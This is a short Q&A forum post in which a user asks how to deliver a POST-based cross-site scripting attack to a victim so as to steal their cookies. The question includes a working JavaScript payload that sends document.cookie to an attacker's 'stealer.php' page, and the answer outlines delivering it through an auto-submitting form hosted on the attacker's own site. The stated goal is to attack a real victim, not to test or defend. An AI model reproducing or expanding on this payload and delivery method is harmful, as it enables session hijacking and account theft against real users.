# how I send malicious xss-ed URL to steal cookie with post method?

Tags: cookies, xss

I have a problem here,, i have xss vuln website on "search bar" . on the search bar can occurs xss and i can store my own cookie to my other site using this:
hello new Image().src = "https:// site /stealer.php?cookie=" + document.cookie;

nah, how i can send the url like http:// site (.) com/search to my victim if there's no payload on url (because it uses post method) and on the page doen't show any post that can lead to XSS

or if there's another impact please explaon to me

thank you

Answer (score 0):

You send them a URL to *your* website which in turn auto submits a form with the needed POST request to the website in question.

Comment: how I can do that ? please explain bro,, or if u have example @Erlend